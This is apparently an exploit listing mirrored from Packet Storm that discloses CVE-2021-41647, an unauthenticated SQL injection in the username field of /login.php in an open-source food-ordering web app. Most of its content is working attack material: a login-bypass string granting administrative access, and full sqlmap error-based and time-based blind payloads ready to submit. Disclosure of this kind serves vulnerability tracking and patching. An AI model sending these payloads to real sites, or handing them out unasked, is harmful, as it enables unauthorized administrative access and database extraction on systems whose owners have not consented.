Share
## https://sploitus.com/exploit?id=PACKETSTORM:164422
CVE-2021-41647 SQL Injection in Online-Food-Ordering-Web-App  
  
The Online-Food-Ordering-Web-App is vulnerable to un-authenticated error and time-based blind SQL Injection attacks. The username parameter on the /login.php page does not sanitize the user input, an attacker is able to bypass the login using a simple bypass technique.  
Link To Application  
  
Online-Food-Ordering-Web-App  
Affected Components & Parameter  
  
URL: /login.php  
PARAMETER: username  
POC'S  
LOGIN BYPASS PAYLOAD  
  
To bypass the user login and gain full administrative access, payload in the username input field: user' or 1=1-- -  
SQLMAP PAYLOADS  
  
Parameter: username (POST Request) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf  
  
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf  
  
  
Discovered by  
  
Jason Colyvas  
MOBIUSBINARY  
September 20th, 2021